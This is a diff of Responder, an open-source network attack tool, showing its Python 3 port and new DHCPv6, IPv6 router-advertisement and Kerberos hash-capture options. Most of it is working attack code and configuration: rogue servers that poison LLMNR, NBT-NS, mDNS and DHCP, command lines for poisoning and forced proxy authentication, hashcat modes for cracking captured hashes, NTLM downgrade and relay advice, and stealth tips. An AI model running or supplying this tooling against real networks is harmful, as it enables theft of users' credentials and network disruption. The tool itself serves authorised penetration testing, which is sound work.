+; MDNS TLD not to respond to (default = _dosvc). Do not add the ".", only the TLD.
+; Example: DontRespondToTLD = _dosvc, _blasvc, etc
+DontRespondToTLD = _dosvc
+
 ; If set to On, we will stop answering further requests from a host
 ; if a hash has been previously captured for this host.
 AutoIgnoreAfterSuccess = Off
@@ -58,11 +79,63 @@ AutoIgnoreAfterSuccess = Off
 ; This may break file serving and is useful only for hash capture
 CaptureMultipleCredentials = On
 
-; If set to On, we will write to file all hashes captured from the same host. 
-; In this case, Responder will log from 172.16.0.12 all user hashes: domain\toto, 
+; If set to On, we will write to file all hashes captured from the same host.
+; In this case, Responder will log from 172.16.0.12 all user hashes: domain\toto,
 ; domain\popo, domain\zozo. Recommended value: On, capture everything.
 CaptureMultipleHashFromSameHost = On
 
+;IPv6 section
+[DHCPv6 Server]
+
+; Domain to filter DNS and DHCPv6 poisoning responses
+; Only respond to clients in this domain
+; Leave empty to poison all domains (NOT RECOMMENDED - causes network disruption)
+; Example: corp.local
+DHCPv6_Domain = 
+
+; Send Router Advertisements to speed up IPv6 configuration
+; Only needed on networks without RA Guard protection
+; Default: Off (more stealthy, waits for natural DHCPv6 SOLICIT)
+; WARNING: Sending RA can be more detectable
+SendRA = Off
+
+; Specific IPv6 address to bind to and advertise as DNS server
+; Leave empty to auto-detect link-local address (recommended)
+; Example: fe80::1
+; Example: 2001:db8::1
+BindToIPv6 = 
+
+[Kerberos]
+; ======================================================
+; Kerberos Operation Mode (NEW FEATURE)
+; ======================================================
+;
+; CAPTURE (default) - Capture Kerberos AS-REP hashes
+;   - Responds with KDC_ERR_PREAUTH_REQUIRED
+;   - Client sends encrypted timestamp
+;   - Responder captures AS-REP hash
+;   - Crack with: hashcat -m 7500
+;   - Good for: Stealthy operation, unique Kerberos hashes
+;
+; FORCE_NTLM - Force client to fall back to NTLM
+;   - Responds with KDC_ERR_ETYPE_NOSUPP
+;   - Client abandons Kerberos, tries NTLM
+;   - Responder's SMB/HTTP captures NetNTLMv2
+;   - Crack with: hashcat -m 5600
+;   - Good for: Relay attacks, faster cracking
+;
+; Choose based on engagement needs:
+; - Use CAPTURE for stealth and Kerberos-specific hashes
+; - Use FORCE_NTLM for relay attacks or faster cracking
+;
+; Default: CAPTURE (if not specified)
+; ======================================================
+
+KerberosMode = CAPTURE
+
+; Alternative: Force NTLM fallback
+;KerberosMode = FORCE_NTLM
+
 [HTTP Server]
 
 ; Set to On to always serve the custom EXE
@@ -79,18 +152,18 @@ Serve-Html = Off
 HtmlFilename = files/AccessDenied.html
 
 ; Custom EXE File to serve
-ExeFilename = files/BindShell.exe
+ExeFilename = ;files/filetoserve.exe
 
 ; Name of the downloaded .exe that the client will see
 ExeDownloadName = ProxyClient.exe
 
 ; Custom WPAD Script
-WPADScript = function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "ProxySrv")||shExpMatch(host, "(*.ProxySrv|ProxySrv)")) return "DIRECT"; return 'PROXY ProxySrv:3128; PROXY ProxySrv:3141; DIRECT';}
+; Only set one if you really know what you're doing. Responder is taking care of that and inject the right one, with your current IP address.
+WPADScript =
 
 ; HTML answer to inject in HTTP responses (before </body> tag).
-; Set to an empty string to disable.
-; In this example, we redirect make users' browsers issue a request to our rogue SMB server.
-HTMLToInject = <img src='file://RespProxySrv/pictures/logo.jpg' alt='Loading' height='1' width='1'>
+; leave empty if you want to use the default one (redirect to SMB on your IP address).
+HTMLToInject =
 
 [HTTPS Server]
 

Responder.py

@@ -1,4 +1,4 @@
-#!/usr/bin/env python
+#!/usr/bin/env python3
 # This file is part of Responder, a network take-over set of tools 
 # created and maintained by Laurent Gaffie.
 # email: laurent.gaffie@gmail.com
@@ -14,43 +14,306 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
+import asyncio
 import optparse
 import ssl
-
-from SocketServer import TCPServer, UDPServer, ThreadingMixIn
+try:
+	from SocketServer import TCPServer, UDPServer, ThreadingMixIn
+except:
+	from socketserver import TCPServer, UDPServer, ThreadingMixIn
 from threading import Thread
 from utils import *
 import struct
 banner()
 
-parser = optparse.OptionParser(usage='python %prog -I eth0 -w -r -f\nor:\npython %prog -I eth0 -wrf', version=settings.__version__, prog=sys.argv[0])
-parser.add_option('-A','--analyze',        action="store_true", help="Analyze mode. This option allows you to see NBT-NS, BROWSER, LLMNR requests without responding.", dest="Analyze", default=False)
-parser.add_option('-I','--interface',      action="store",      help="Network interface to use, you can use 'ALL' as a wildcard for all interfaces", dest="Interface", metavar="eth0", default=None)
-parser.add_option('-i','--ip',             action="store",      help="Local IP to use \033[1m\033[31m(only for OSX)\033[0m", dest="OURIP", metavar="10.0.0.21", default=None)
+import optparse
+import textwrap
 
-parser.add_option('-e', "--externalip",    action="store",      help="Poison all requests with another IP address than Responder's one.", dest="ExternalIP",  metavar="10.0.0.22", default=None)
+class ResponderHelpFormatter(optparse.IndentedHelpFormatter):
+    """Custom formatter for better help output"""
+    
+    def format_description(self, description):
+        if description:
+            return description + "\n"
+        return ""
+    
+    def format_epilog(self, epilog):
+        if epilog:
+            return "\n" + epilog + "\n"
+        return ""
 
-parser.add_option('-b', '--basic',         action="store_true", help="Return a Basic HTTP authentication. Default: NTLM", dest="Basic", default=False)
-parser.add_option('-r', '--wredir',        action="store_true", help="Enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network. Default: False", dest="Wredirect", default=False)
-parser.add_option('-d', '--NBTNSdomain',   action="store_true", help="Enable answers for netbios domain suffix queries. Answering to domain suffixes will likely break stuff on the network. Default: False", dest="NBTNSDomain", default=False)
-parser.add_option('-f','--fingerprint',    action="store_true", help="This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query.", dest="Finger", default=False)
-parser.add_option('-w','--wpad',           action="store_true", help="Start the WPAD rogue proxy server. Default value is False", dest="WPAD_On_Off", default=False)
-parser.add_option('-u','--upstream-proxy', action="store",      help="Upstream HTTP proxy used by the rogue WPAD Proxy for outgoing requests (format: host:port)", dest="Upstream_Proxy", default=None)
-parser.add_option('-F','--ForceWpadAuth',  action="store_true", help="Force NTLM/Basic authentication on wpad.dat file retrieval. This may cause a login prompt. Default: False", dest="Force_WPAD_Auth", default=False)
+def create_parser():
+    """Create argument parser with organized option groups"""
+    
+    usage = textwrap.dedent("""\
+        python3 %prog -I eth0 -v""")
+    
+    description = textwrap.dedent("""\
+    ══════════════════════════════════════════════════════════════════════════════
+      Responder - LLMNR/NBT-NS/mDNS Poisoner and Rogue Authentication Servers
+    ══════════════════════════════════════════════════════════════════════════════
+    Captures credentials by responding to broadcast/multicast name resolution,
+    DHCP, DHCPv6 requests
+    ══════════════════════════════════════════════════════════════════════════════""")
+    
+    epilog = textwrap.dedent("""\
+    ══════════════════════════════════════════════════════════════════════════════
+      Examples:
+    ══════════════════════════════════════════════════════════════════════════════
+      Basic poisoning:            python3 Responder.py -I eth0 -v
+      
+      ##Watch what's going on:
+      Analyze mode (passive):     python3 Responder.py -I eth0 -Av
 
-parser.add_option('-P','--ProxyAuth',       action="store_true", help="Force NTLM (transparently)/Basic (prompt) authentication for the proxy. WPAD doesn't need to be ON. This option is highly effective when combined with -r. Default: False", dest="ProxyAuth_On_Off", default=False)
+      ##Working on old networks:
+      WPAD with forced auth:      python3 Responder.py -I eth0 -wFv
 
-parser.add_option('--lm',                  action="store_true", help="Force LM hashing downgrade for Windows XP/2003 and earlier. Default: False", dest="LM_On_Off", default=False)
-parser.add_option('-v','--verbose',        action="store_true", help="Increase verbosity.", dest="Verbose")
+      ##Great module:
+      Proxy auth:                 python3 Responder.py -I eth0 -Pv
+
+      ##DHCPv6 + Proxy authentication:
+      DHCPv6 attack:              python3 Responder.py -I eth0 --dhcpv6 -vP
+
+      ##DHCP -> WPAD injection -> Proxy authentication:
+      DHCP + WPAD injection:      python3 Responder.py -I eth0 -Pvd
+
+      ##Poison requests to an arbitrary IP:
+      Poison with external IP:    python3 Responder.py -I eth0 -e 10.0.0.100
+
+      ##Poison requests to an arbitrary IPv6 IP:
+      Poison with external IPv6:  python3 Responder.py -I eth0 -6 2800:ac:4000:8f9e:c5eb:2193:71:1d12
+    ══════════════════════════════════════════════════════════════════════════════
+      For more info: https://github.com/lgandx/Responder/blob/master/README.md
+    ══════════════════════════════════════════════════════════════════════════════""")
+    
+    parser = optparse.OptionParser(
+        usage=usage,
+        version=settings.__version__,
+        prog="Responder.py",
+        description=description,
+        epilog=epilog,
+        formatter=ResponderHelpFormatter()
+    )
+    
+    # -------------------------------------------------------------------------
+    # REQUIRED OPTIONS
+    # -------------------------------------------------------------------------
+    required = optparse.OptionGroup(parser, 
+        "Required Options",
+        "These options must be specified")
+    
+    required.add_option('-I', '--interface',
+        action="store",
+        dest="Interface",
+        metavar="eth0",
+        default=None,
+        help="Network interface to use. Use 'ALL' for all interfaces.")
+    
+    parser.add_option_group(required)
+    
+    # -------------------------------------------------------------------------
+    # POISONING OPTIONS
+    # -------------------------------------------------------------------------
+    poisoning = optparse.OptionGroup(parser,
+        "Poisoning Options", 
+        "Control how Responder poisons name resolution requests")
+    
+    poisoning.add_option('-A', '--analyze',
+        action="store_true",
+        dest="Analyze",
+        default=False,
+        help="Analyze mode. See requests without poisoning. (passive)")
+    
+    poisoning.add_option('-e', '--externalip',
+        action="store",
+        dest="ExternalIP",
+        metavar="IP",
+        default=None,
+        help="Poison with a different IPv4 address than Responder's.")
+    
+    poisoning.add_option('-6', '--externalip6',
+        action="store",
+        dest="ExternalIP6",
+        metavar="IPv6",
+        default=None,
+        help="Poison with a different IPv6 address than Responder's.")
+    
+    poisoning.add_option('--rdnss',
+        action="store_true",
+        dest="RDNSS_On_Off",
+        default=False,
+        help="Poison via Router Advertisements with RDNSS. Sets attacker as IPv6 DNS.")
+    
+    poisoning.add_option('--dnssl',
+        action="store",
+        dest="DNSSL_Domain",
+        metavar="DOMAIN",
+        default=None,
+        help="Poison via Router Advertisements with DNSSL. Injects DNS search suffix.")
+    
+    poisoning.add_option('-t', '--ttl',
+        action="store",
+        dest="TTL",
+        metavar="HEX",
+        default=None,
+        help="Set TTL for poisoned answers. Hex value (30s = 1e) or 'random'.")
+    
+    poisoning.add_option('-N', '--AnswerName',
+        action="store",
+        dest="AnswerName",
+        metavar="NAME",
+        default=None,
+        help="Canonical name in LLMNR answers. (for Kerberos relay over HTTP)")
+    
+    parser.add_option_group(poisoning)
+    
+    # -------------------------------------------------------------------------
+    # DHCP OPTIONS
+    # -------------------------------------------------------------------------
+    dhcp = optparse.OptionGroup(parser,
+        "DHCP Options",
+        "DHCP and DHCPv6 poisoning attacks")
+    
+    dhcp.add_option('-d', '--DHCP',
+        action="store_true",
+        dest="DHCP_On_Off",
+        default=False,
+        help="Enable DHCPv4 poisoning. Injects WPAD in DHCP responses.")
+    
+    dhcp.add_option('-D', '--DHCP-DNS',
+        action="store_true",
+        dest="DHCP_DNS",
+        default=False,
+        help="Inject DNS server (not WPAD) in DHCPv4 responses.")
+    
+    dhcp.add_option('--dhcpv6',
+        action="store_true",
+        dest="DHCPv6_On_Off",
+        default=False,
+        help="Enable DHCPv6 poisoning. WARNING: May disrupt network.")
+    
+    parser.add_option_group(dhcp)
+    
+    # -------------------------------------------------------------------------
+    # WPAD / PROXY OPTIONS
+    # -------------------------------------------------------------------------
+    wpad = optparse.OptionGroup(parser,
+        "WPAD / Proxy Options",
+        "Web Proxy Auto-Discovery attacks")
+    
+    wpad.add_option('-w', '--wpad',
+        action="store_true",
+        dest="WPAD_On_Off",
+        default=False,
+        help="Start WPAD rogue proxy server.")
+    
+    wpad.add_option('-F', '--ForceWpadAuth',
+        action="store_true",
+        dest="Force_WPAD_Auth",
+        default=False,
+        help="Force NTLM/Basic auth on wpad.dat retrieval. (may show prompt)")
+    
+    wpad.add_option('-P', '--ProxyAuth',
+        action="store_true",
+        dest="ProxyAuth_On_Off",
+        default=False,
+        help="Force proxy authentication. Highly effective. (can't use with -w)")
+    
+    wpad.add_option('-u', '--upstream-proxy',
+        action="store",
+        dest="Upstream_Proxy",
+        metavar="HOST:PORT",
+        default=None,
+        help="Upstream proxy for rogue WPAD proxy outgoing requests.")
+    
+    parser.add_option_group(wpad)
+    
+    # -------------------------------------------------------------------------
+    # AUTHENTICATION OPTIONS  
+    # -------------------------------------------------------------------------
+    auth = optparse.OptionGroup(parser,
+        "Authentication Options",
+        "Control authentication methods and downgrades")
+    
+    auth.add_option('-b', '--basic',
+        action="store_true",
+        dest="Basic",
+        default=False,
+        help="Return HTTP Basic auth instead of NTLM. (cleartext passwords)")
+    
+    auth.add_option('--lm',
+        action="store_true",
+        dest="LM_On_Off",
+        default=False,
+        help="Force LM hashing downgrade. (for Windows XP/2003)")
+    
+    auth.add_option('--disable-ess',
+        action="store_true",
+        dest="NOESS_On_Off",
+        default=False,
+        help="Disable Extended Session Security. (NTLMv1 downgrade)")
+    
+    auth.add_option('-E', '--ErrorCode',
+        action="store_true",
+        dest="ErrorCode",
+        default=False,
+        help="Return STATUS_LOGON_FAILURE. (enables WebDAV auth capture)")
+    
+    parser.add_option_group(auth)
+    
+    # -------------------------------------------------------------------------
+    # OUTPUT OPTIONS
+    # -------------------------------------------------------------------------
+    output = optparse.OptionGroup(parser,
+        "Output Options",
+        "Control verbosity and logging")
+    
+    output.add_option('-v', '--verbose',
+        action="store_true",
+        dest="Verbose",
+        default=False,
+        help="Increase verbosity. (recommended)")
+    
+    output.add_option('-Q', '--quiet',
+        action="store_true",
+        dest="Quiet",
+        default=False,
+        help="Quiet mode. Minimal output from poisoners.")
+    
+    parser.add_option_group(output)
+    
+    # -------------------------------------------------------------------------
+    # PLATFORM OPTIONS
+    # -------------------------------------------------------------------------
+    platform = optparse.OptionGroup(parser,
+        "Platform Options",
+        "OS-specific settings")
+    
+    platform.add_option('-i', '--ip',
+        action="store",
+        dest="OURIP",
+        metavar="IP",
+        default=None,
+        help="Local IP to use. (OSX only)")
+    
+    parser.add_option_group(platform)
+    
+    return parser
+
+parser = create_parser()
 options, args = parser.parse_args()
 
 if not os.geteuid() == 0:
-    print color("[!] Responder must be run as root.")
+    print(color("[!] Responder must be run as root."))
     sys.exit(-1)
-elif options.OURIP is None and IsOsX() is True:
-    print "\n\033[1m\033[31mOSX detected, -i mandatory option is missing\033[0m\n"
+elif options.OURIP == None and IsOsX() == True:
+    print("\n\033[1m\033[31mOSX detected, -i mandatory option is missing\033[0m\n")
     parser.print_help()
     exit(-1)
+    
+elif options.ProxyAuth_On_Off and options.WPAD_On_Off:
+    print("\n\033[1m\033[31mYou cannot use WPAD server and Proxy_Auth server at the same time, choose one of them.\033[0m\n")
+    exit(-1)
 
 settings.init()
 settings.Config.populate(options)
@@ -59,20 +322,26 @@ StartupMessage()
 
 settings.Config.ExpandIPRanges()
 
-if settings.Config.AnalyzeMode:
-	print color('[i] Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned.', 3, 1)
-
 #Create the DB, before we start Responder.
 CreateResponderDb()
 
+Have_IPv6 = settings.Config.IPv6
+
 class ThreadingUDPServer(ThreadingMixIn, UDPServer):
 	def server_bind(self):
 		if OsInterfaceIsSupported():
 			try:
-                                if settings.Config.Bind_To_ALL:
-                                	pass
-                                else:
-					self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0')
+				if settings.Config.Bind_To_ALL:
+					pass
+				else:
+					if (sys.version_info > (3, 0)):
+						self.socket.setsockopt(socket.SOL_SOCKET, 25, bytes(settings.Config.Interface+'\0', 'utf-8'))
+						if Have_IPv6:
+							self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
+					else:
+						self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0')
+						if Have_IPv6:
+							self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
 			except:
 				pass
 		UDPServer.server_bind(self)
@@ -81,10 +350,17 @@ class ThreadingTCPServer(ThreadingMixIn, TCPServer):
 	def server_bind(self):
 		if OsInterfaceIsSupported():
 			try:
-                                if settings.Config.Bind_To_ALL:
-                                	pass
-                                else:
-					self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0')
+				if settings.Config.Bind_To_ALL:
+					pass
+				else:
+					if (sys.version_info > (3, 0)):
+						self.socket.setsockopt(socket.SOL_SOCKET, 25, bytes(settings.Config.Interface+'\0', 'utf-8'))
+						if Have_IPv6:
+							self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
+					else:
+						self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0')
+						if Have_IPv6:
+							self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
 			except:
 				pass
 		TCPServer.server_bind(self)
@@ -93,221 +369,382 @@ class ThreadingTCPServerAuth(ThreadingMixIn, TCPServer):
 	def server_bind(self):
 		if OsInterfaceIsSupported():
 			try:
-                                if settings.Config.Bind_To_ALL:
-                                	pass
-                                else:
-					self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0')
+				if settings.Config.Bind_To_ALL:
+					pass
+				else:
+					if (sys.version_info > (3, 0)):
+						self.socket.setsockopt(socket.SOL_SOCKET, 25, bytes(settings.Config.Interface+'\0', 'utf-8'))
+						if Have_IPv6:
+							self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
+					else:
+						self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0')
+						if Have_IPv6:
+							self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
 			except:
 				pass
-                self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0))
+		self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0))
 		TCPServer.server_bind(self)
+	
+class ThreadingUDPDHCPv6Server(ThreadingMixIn, UDPServer):
+	allow_reuse_address = True
+	address_family = socket.AF_INET6
+	
+	def server_bind(self):
+		import socket
+		import struct
+		
+		# Bind to :: (accept packets to ANY address including multicast)
+		UDPServer.server_bind(self)
+		
+		print(color("[DHCPv6] Make sure to review DHCPv6 settings Responder.conf\n[DHCPv6] Only run this module for short periods of time, you might cause some disruption.", 2, 1))
+		
+		# Join multicast group
+		group = socket.inet_pton(socket.AF_INET6, 'ff02::1:2')
+		if_index = socket.if_nametoindex(settings.Config.Interface)
+		mreq = group + struct.pack('@I', if_index)
+		
+		try:
+			self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_JOIN_GROUP, mreq)
+			self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_MULTICAST_LOOP, 1)
+			print(color("[DHCPv6] Joined ff02::1:2 port 547 on %s" % settings.Config.Interface, 2, 1))
+		except Exception as e:
+			print(color("[!] Multicast join failed: %s" % str(e), 1, 1))
+
+# Set address family to IPv6
+ThreadingUDPDHCPv6Server.address_family = socket.AF_INET6
 
 class ThreadingUDPMDNSServer(ThreadingMixIn, UDPServer):
 	def server_bind(self):
 		MADDR = "224.0.0.251"
-		
+		MADDR6 = 'ff02::fb'
 		self.socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR, 1)
 		self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255)
-		
 		Join = self.socket.setsockopt(socket.IPPROTO_IP,socket.IP_ADD_MEMBERSHIP, socket.inet_aton(MADDR) + settings.Config.IP_aton)
 
+		#IPV6:
+		if (sys.version_info > (3, 0)):
+			if Have_IPv6:
+				mreq = socket.inet_pton(socket.AF_INET6, MADDR6) + struct.pack('@I', if_nametoindex2(settings.Config.Interface))
+				self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_JOIN_GROUP, mreq)
+		else:
+			if Have_IPv6:
+				mreq = socket.inet_pton(socket.AF_INET6, MADDR6) + struct.pack('@I', if_nametoindex2(settings.Config.Interface))
+				self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_JOIN_GROUP, mreq)
 		if OsInterfaceIsSupported():
 			try:
-                                if settings.Config.Bind_To_ALL:
-                                	pass
-                                else:
-					self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0')
+				if settings.Config.Bind_To_ALL:
+					pass
+				else:
+					if (sys.version_info > (3, 0)):
+						self.socket.setsockopt(socket.SOL_SOCKET, 25, bytes(settings.Config.Interface+'\0', 'utf-8'))
+						if Have_IPv6:
+							self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
+					else:
+						self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0')
+						if Have_IPv6:
+							self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
 			except:
 				pass
 		UDPServer.server_bind(self)
 
 class ThreadingUDPLLMNRServer(ThreadingMixIn, UDPServer):
 	def server_bind(self):
-		MADDR = "224.0.0.252"
+		MADDR  = '224.0.0.252'
+		MADDR6 = 'FF02:0:0:0:0:0:1:3'
 		self.socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
-		self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255)
-		
+		self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255)		
 		Join = self.socket.setsockopt(socket.IPPROTO_IP,socket.IP_ADD_MEMBERSHIP,socket.inet_aton(MADDR) + settings.Config.IP_aton)
-		
+
+		#IPV6:
+		if Have_IPv6:
+			mreq = socket.inet_pton(socket.AF_INET6, MADDR6) + struct.pack('@I', if_nametoindex2(settings.Config.Interface))
+			self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_JOIN_GROUP, mreq)
 		if OsInterfaceIsSupported():
 			try:
-                                if settings.Config.Bind_To_ALL:
-                                	pass
-                                else:
-					self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0')
+				if settings.Config.Bind_To_ALL:
+					pass
+				else:
+					if (sys.version_info > (3, 0)):
+						self.socket.setsockopt(socket.SOL_SOCKET, 25, bytes(settings.Config.Interface+'\0', 'utf-8'))
+						if Have_IPv6:
+							self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
+					else:
+						self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0')
+						if Have_IPv6:
+							self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
 			except:
 				pass
 		UDPServer.server_bind(self)
+		
 
 ThreadingUDPServer.allow_reuse_address = 1
+if Have_IPv6:
+	ThreadingUDPServer.address_family = socket.AF_INET6
+
 ThreadingTCPServer.allow_reuse_address = 1
+if Have_IPv6:
+	ThreadingTCPServer.address_family = socket.AF_INET6
+
 ThreadingUDPMDNSServer.allow_reuse_address = 1
+if Have_IPv6:
+	ThreadingUDPMDNSServer.address_family = socket.AF_INET6
+
 ThreadingUDPLLMNRServer.allow_reuse_address = 1
+if Have_IPv6:
+	ThreadingUDPLLMNRServer.address_family = socket.AF_INET6
+
 ThreadingTCPServerAuth.allow_reuse_address = 1
+if Have_IPv6:
+	ThreadingTCPServerAuth.address_family = socket.AF_INET6
 
 def serve_thread_udp_broadcast(host, port, handler):
 	try:
-		server = ThreadingUDPServer((host, port), handler)
+		server = ThreadingUDPServer(('', port), handler)
 		server.serve_forever()
 	except:
-		print color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running."
+		print(color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running.")
 
 def serve_NBTNS_poisoner(host, port, handler):
-	serve_thread_udp_broadcast(host, port, handler)
+	serve_thread_udp_broadcast('', port, handler)
 
 def serve_MDNS_poisoner(host, port, handler):
 	try:
-		server = ThreadingUDPMDNSServer((host, port), handler)
+		server = ThreadingUDPMDNSServer(('', port), handler)
 		server.serve_forever()
 	except:
-		print color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running."
+		print(color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running.")
 
 def serve_LLMNR_poisoner(host, port, handler):
 	try:
-		server = ThreadingUDPLLMNRServer((host, port), handler)
+		server = ThreadingUDPLLMNRServer(('', port), handler)
 		server.serve_forever()
 	except:
-                raise
-		print color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running."
-
+		print(color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running.")
+		
 def serve_thread_udp(host, port, handler):
 	try:
 		if OsInterfaceIsSupported():
-			server = ThreadingUDPServer((host, port), handler)
+			server = ThreadingUDPServer(('', port), handler)
 			server.serve_forever()
 		else:
-			server = ThreadingUDPServer((host, port), handler)
+			server = ThreadingUDPServer(('', port), handler)
 			server.serve_forever()
 	except:
-		print color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running."
+		print(color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running.")
 
+def serve_thread_dhcpv6(host, port, handler):
+	try:
+		# MUST bind to :: to receive multicast packets
+		server = ThreadingUDPDHCPv6Server(('::', port), handler)
+		server.serve_forever()
+	except Exception as e:
+		print(color("[!] DHCPv6 error: %s" % str(e), 1, 1))
+		
 def serve_thread_tcp(host, port, handler):
 	try:
 		if OsInterfaceIsSupported():
-			server = ThreadingTCPServer((host, port), handler)
+			server = ThreadingTCPServer(('', port), handler)
 			server.serve_forever()
 		else:
-			server = ThreadingTCPServer((host, port), handler)
+			server = ThreadingTCPServer(('', port), handler)
 			server.serve_forever()
 	except:
-		print color("[!] ", 1, 1) + "Error starting TCP server on port " + str(port) + ", check permissions or other servers running."
+		print(color("[!] ", 1, 1) + "Error starting TCP server on port " + str(port) + ", check permissions or other servers running.")
 
 def serve_thread_tcp_auth(host, port, handler):
 	try:
 		if OsInterfaceIsSupported():
-			server = ThreadingTCPServerAuth((host, port), handler)
+			server = ThreadingTCPServerAuth(('', port), handler)
 			server.serve_forever()
 		else:
-			server = ThreadingTCPServerAuth((host, port), handler)
+			server = ThreadingTCPServerAuth(('', port), handler)
 			server.serve_forever()
 	except:
-		print color("[!] ", 1, 1) + "Error starting TCP server on port " + str(port) + ", check permissions or other servers running."
+		print(color("[!] ", 1, 1) + "Error starting TCP server on port " + str(port) + ", check permissions or other servers running.")
 
 def serve_thread_SSL(host, port, handler):
 	try:
 
 		cert = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLCert)
 		key =  os.path.join(settings.Config.ResponderPATH, settings.Config.SSLKey)
-
+		context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
+		context.load_cert_chain(cert, key)
 		if OsInterfaceIsSupported():
-			server = ThreadingTCPServer((host, port), handler)
-			server.socket = ssl.wrap_socket(server.socket, certfile=cert, keyfile=key, server_side=True)
+			server = ThreadingTCPServer(('', port), handler)
+			server.socket = context.wrap_socket(server.socket, server_side=True)
 			server.serve_forever()
 		else:
-			server = ThreadingTCPServer((host, port), handler)
-			server.socket = ssl.wrap_socket(server.socket, certfile=cert, keyfile=key, server_side=True)
+			server = ThreadingTCPServer(('', port), handler)
+			server.socket = context.wrap_socket(server.socket, server_side=True)
 			server.serve_forever()
 	except:
-		print color("[!] ", 1, 1) + "Error starting SSL server on port " + str(port) + ", check permissions or other servers running."
+		print(color("[!] ", 1, 1) + "Error starting SSL server on port " + str(port) + ", check permissions or other servers running.")
+
 
 def main():
 	try:
+		if (sys.version_info < (3, 0)):
+			print(color('\n\n[-]', 3, 1) + " Still using python 2? :(")
+		print(color('\n[+]', 2, 1) + " Listening for events...\n")
+
 		threads = []
+        #IPv6 Poisoning
+		# DHCPv6 Server (disabled by default, enable with --dhcpv6)
+		if settings.Config.DHCPv6_On_Off:
+		    from servers.DHCPv6 import DHCPv6
+		    threads.append(Thread(target=serve_thread_dhcpv6, args=('', 547, DHCPv6,)))
 
-		# Load (M)DNS, NBNS and LLMNR Poisoners
-		from poisoners.LLMNR import LLMNR
-		from poisoners.NBTNS import NBTNS
-		from poisoners.MDNS import MDNS
-		threads.append(Thread(target=serve_LLMNR_poisoner, args=('', 5355, LLMNR,)))
-		threads.append(Thread(target=serve_MDNS_poisoner,  args=('', 5353, MDNS,)))
-		threads.append(Thread(target=serve_NBTNS_poisoner, args=('', 137,  NBTNS,)))
+		if settings.Config.RDNSS_On_Off or settings.Config.DNSSL_Domain:
+		    from poisoners.RDNSS import RDNSS
+		    threads.append(Thread(target=RDNSS, args=(
+        settings.Config.Interface,      # 1. interface
+        settings.Config.RDNSS_On_Off,   # 2. rdnss_enabled (bool) 
+        settings.Config.DNSSL_Domain    # 3. dnssl_domain (str or None)
+    )))
+			    
+		# Load MDNS, NBNS and LLMNR Poisoners
+		if settings.Config.LLMNR_On_Off:
+		    from poisoners.LLMNR import LLMNR
+		    threads.append(Thread(target=serve_LLMNR_poisoner, args=('', 5355, LLMNR,)))
 
+		if settings.Config.NBTNS_On_Off:
+		    from poisoners.NBTNS import NBTNS
+		    threads.append(Thread(target=serve_NBTNS_poisoner, args=('', 137,  NBTNS,)))
+
+		if settings.Config.MDNS_On_Off:
+		    from poisoners.MDNS import MDNS
+		    threads.append(Thread(target=serve_MDNS_poisoner,  args=('', 5353, MDNS,)))
+
+		#// Vintage Responder BOWSER module, now disabled by default. 
+		#// Generate to much noise & easily detectable on the network when in analyze mode.
 		# Load Browser Listener
-		from servers.Browser import Browser
